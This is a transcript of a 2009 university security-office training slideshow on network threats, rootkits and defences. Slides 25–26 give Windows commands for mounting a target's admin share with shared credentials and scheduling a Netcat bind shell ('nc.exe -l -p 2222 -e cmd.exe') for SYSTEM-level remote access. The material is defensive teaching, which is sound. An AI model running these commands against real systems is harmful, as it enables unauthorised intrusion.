1 / 34

Network Security April 1, 2009

Network Security April 1, 2009. Disclaimer/AUP Review Kevin Lanning, MSIS GSEC CISSP Information Security Office UNC-Chapel Hill Sources: Sans.org, courses 401,504 and 508 Isc2.org CBK. Information Security Triad. Policy. Information Security Triad Networking.

aria
Download Presentation

Network Security April 1, 2009

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript

  1. Network SecurityApril 1, 2009 Disclaimer/AUP Review Kevin Lanning, MSIS GSEC CISSP Information Security Office UNC-Chapel Hill Sources: Sans.org, courses 401,504 and 508 Isc2.org CBK

  2. Information Security Triad Policy

  3. Information Security TriadNetworking Availability-the network as a key asset. VOIP and wireless Integrity-transmitted data must not contain errors Confidentiality-protection of sensitive information in transit

  4. The Network Gary Larsen, The Complete Far Side

  5. Threats • Use of the network to carry out attacks • Reconnaisance • White, grey and black box • Google hacking-open positions, contact lists, key staff, employee websites, design docs-examples • DNS interrogation, zone transfer-dig or nslookup • Whois • Scanning/OS finger printing • Active-Nessus, nmap, Cheops network mapper with gui using TTL field of IP header • passive • Password cracking-brute force, dictionary, LANMAN • Intrusion and covering the tracks-patching, log edits, laying low, listening

  6. Threats • Use of the network to carry out attacks(cont’d) • Maintaining control-Netcat, cron, backdoors • Reverse WWW shell-uses port 80 out for external connection. Shell runs on host with input from external system. Called shoveling a UI. FW scope • Malware distribution • Remote control-Radmin, Dameware, Sub7, SSH • Worms-morphing to functional equivalents but with diff code base=signature countermeasures • Botnets • via worms, attachments, bundled with software, browser exploits-solves scaling problem • IRC controls most common

  7. Threats • Sniffing and snooping • Hubs vs. switches • Fiber • Wireless-WEP, WPA, 802.11i/WPA2-SSL VPNs? Ghost in the AP • Credential replay-tcpreplay • Cable-segment sniffing-nic in promisc • Attack against the network itself • Denial of service • Attacks against protocols-half open tcp connections, BGP youtube down due to specific route published by Pakistan-Arbor Networks • Own the network with credentials

  8. Threats & Risks • Attacks using encryption-mask malicious code • Zero day exploits-solution unknown to vendor and public. • Vulnerable code-buffer overflows = not checking buffer sizes before moving things around in memory; goal = overwrite the instruction pointer and thus overwrite with what you want to execute • Remote access-PDAs, laptops, unencrypted • Covert channels-Stego,IPID field data transfer http://firstmonday.org/htbin/cgiwrap/bin/ojs/index.php/fm/article/view/528/449

  9. Threats & RisksEnd Users • Messaging/browsing • Social engineering/Phishing • Weak protocols-telnet, rsh, x11, ftp

  10. Threats & Risks • IP address spoofing-hping • Arp cache poisoning-gratuitous arp • Session hijacking-sniffing and spoofing-man-n-middle-ettercap • Source routing-source specifies each router • DNS cache poisoning • Replay attacks-netcat, tcpreplay

  11. Threats & Risks • Bots-application level Trojan Horses and backdoors which SCALE. • Backdoors-bypass normal security controls. Netcat listener, tini (3 KB) push it in a buffer overflow? • Ethernet card-firmware malware. Wireless? • BIOS or CPU microcode level root kits? http://www.packetstormsecurity.nl/0407-exploits/OpteronMicrocode.txt • Rootkits-thousands of them • User mode-critical OS components replaced. Hacker defender • Kernel mode-Truly evil. Kernel altered.

  12. Threats & RisksRootkits-LRK • One example of a rootkit for Unix=LRK • LRK-/bin/login is altered to allow attacker root access. • Normal accting is bypassed (who) & chg of root has no impact on backdoor. • Encrypted remote via sshd. • Ethernet in promiscuous mode. Trojan version of ifconfig hides PROMISC flag • Several programs are replaced with new versions so that any non-root user who runs one of the replaced apps with a command that includes the backdoor password in an argument is immediately elevated to root. • A replacement for ps hides the attackers processes • A replacement for killall provides that the attackers processes cannot be killed • Crontab is modified so that scheduled attacker processes do not show in cron config files. • Netstat is altered to never show ports being used by the intruder. • Ls and find are altered to never show attackers files. • Du is altered to avoid showing the disk usage of the attacker’s files. • Syslogd is modified to hide events associated with the intrusion. • Fix tool returns “last modified” dates to originals, including the CRC checksum of programs

  13. Trends • Anti-malware tools only catching a minority • Repackaging • Encoding • Morphing malware-same function but with different code base • Firewalling of malware • Multi-exploit & multi-platform worms-(Nimda had 12=buffer overflows, browser exploits, etc.)

  14. Trends • More application layer attacks-web(WGET-NIX and dows; CURL-PERL tool for constructing web requests and automated harvesting) • PHP #1 application attack at UNC-CH • SQL injection attacks via web • Click, drag and drop hacker tools-Metasploit 3.0, scale the growth • Hacking for profit, organized crime involved • Lower diversity results in faster spread

  15. Intrusion Prevention Stats

  16. Defenses/Countermeasures • Know your environment-bus, gov, edu • Know where the valuable stuff exists • Network Design for Defense in Depth • Routing-choice of protocols, source routing • Split DNS • Out of band network for availability • Firewalls • Packet filtering • Stateful • Proxy • DMZ-web, db • RFC 1918-non-routable addresses

  17. Defenses/Countermeasures • Secure protocols-use for good OR evil • IPSEC • SSL • SSH • Passwords=security 101 • Intrusion Protection • Network intrusion Detection Sensors-tiny fragment=reassembly buffers=cd /etc/sha, fragment overlap – HD Moore “Thermoptic Camoflage” = OS dependent • Anti-virus, spyware, malware-http://secunia.com/gfx/Secunia_Exploit-vs-AV_test-Oct-2008.pdf • HIDS, HIPS, “End Point” protection

  18. Defenses/Countermeasures • Secure Administration • Harden public facing systems such as DNS, split brain DNS, zone transfers only for specified systems • Don’t allow insecure protocols or scope them-telnet, ftp • Force password changes often • Auth/Auth • Group policy • Bastion Hosts-systems hardened to withstand attack • Build a DMZ-web/db • Separate logging server

  19. Defenses/Countermeasures • Host Hardening • File integrity checkers-tripwire • Defense in Depth • Only enable needed services-reduce attack surface • Check for listening ports open files-netstat –na and lsof -i • What has ports open-tcpview • Profile system at build • Patch, patch, patch • Offline or firewalled build • Special purpose systems-lower privs-VMs, Deep Freeze • Reduced privs • Log management-write once media for logging • Vulnerability management-demo

  20. Defenses/Countermeasures • Use secure packages and versions • Apache mod_security • Exec Shield -- http://en.wikipedia.org/wiki/Exec_Shield • SE Linux -- http://en.wikipedia.org/wiki/SE_Linux • Windows hardening and get rid of NT 4/2000 • Solaris 10 • NSA hardening guideshttp://www.nsa.gov/snac/downloads_redhat.cfm?MenuID=scg10.3.1.1

  21. Defenses/Countermeasures • Encryption • Symmetric key-single key for encryption & decryption • Fast • Secure distribution of key an issue • PKI-Public Key Infrastructure • computer users auth to each other without prior contact. A message encrypted with the recipient’s public key can only be decrypted with the corresponding private key • Digital signature-message signed with private key can be verified by anyone with the public key • Certificate authority or web of trust model • Key exchange is secure • slow • Hash functions or digests-input of any length with a fixed length output = integrity check • http://upload.wikimedia.org/wikipedia/commons/6/6b/Hash_function_long.svg

  22. Defenses/Countermeasures • Insiders • Logging and auditing • Access controls • Least privilege • Separation of duties-escalation • Administrative controls • Mandatory vacation • Job rotation

  23. Real Life Scenarios!Careful with the following: • Distributed Denial of Service • Imagine an organization with the same local acct across all critical systems • Web-based banking applications • Port 80 authentication • IPS with false crc but doesn’t reset • Take out the competition

  24. Real Life Scenarios • Distributed Denial of Service • Scenario: • Gambling site • Threat of DDOS • Stratagies to counter?

  25. Real Life ScenariosExtracted from SANS.org 504 with Ed Skoudis Same local acct across all Windows systems • Mount target C$ share and assign next available drive letter: • C:/>net use *\\[target_IP]\C$ [admin pwd] /u: [admin user name] • Start Task Scheduler • C:/>sc \\[target_IP] start schedule • Check local time on target • C:/>net time \\[target_IP]

  26. Real Life Scenarios Same local acct across all Windows systems • Create a batch file with the command to run • C:\> notepad backdoor.bat • C:\> \test\netcat\nc.exe -l -p 2222 -e cmd.exe • Move Netcat and backdoor.bat to the target • Schedule the .bat to run • Use Netcat to connect • C:\> nc target_IP 2222 • Now have full, command-line access with SYSTEM privileges • Now scale it!

  27. Real Life Scenarios • Imagine bankapp_inlsdemo.com • Must be accessible from everywhere • Have no control over hosts • How • Different errors for valid vs. not valid ID • Low, slow brute force • Google hacking • From where? Use the botnet • Scope out account lockouts-pattern?

  28. Real Life Scenarios • Port 80 authentication to a web site without firewall scoping • Remote connection from wireless or cable • Interception of traffic • Google hacking • Same password for other Apps • Intruder breaks in to other App

  29. Real Life Scenarios • Remove the competition • Smurf-spoof the source (use the victim’s source) of a ping to a network’s broadcast address. Spoofed system gets flooded with replies taking it out of the mix. • SYN floods-half open connections consume resources. Difficult to counter if highly distributed. Increase connection queue and timeout half opens. Shorten timeouts?

  30. Real Life Scenarios • Imagine you are a developer at a start-up IPS company. Everybody needs your services and your company could go $public$ • Real time action is the benefit • Must be fast • Hacker exploit? • Reset with bad check sum? • Recalcs???

  31. Real Life Scenarios • Storm worm is a good example of many things • Check it out • http://en.wikipedia.org/wiki/Storm_Worm

  32. Take Aways • Hacker community is very well organized. We must organize too! • Guard network credentials • Hardening guides (see nsa.gov, sans.org, redhat.com, etc) • Vendor recommendations but defense in depth against the zero day exploit • Tools, tools, tools • Host-based IDS/IPS • End user education-they have the power • Exciting time to be in security • Host-based firewall-scope

  33. Take Away and References • Every day brings news and no one is immune. We must collaborate • References • www.honeynet.org • Sans.org (see top 20 and isc.sans.org) • Megasecurity.org (see radmin tools list) • http://www.uscert.gov/ • Vulnerabilitieshttp://www.milw0rm.com/http://secunia.com/ • Microsoftblogs.technet.com/msrc/ • CISecurity http://www.cisecurity.org/benchmarks.html

More Related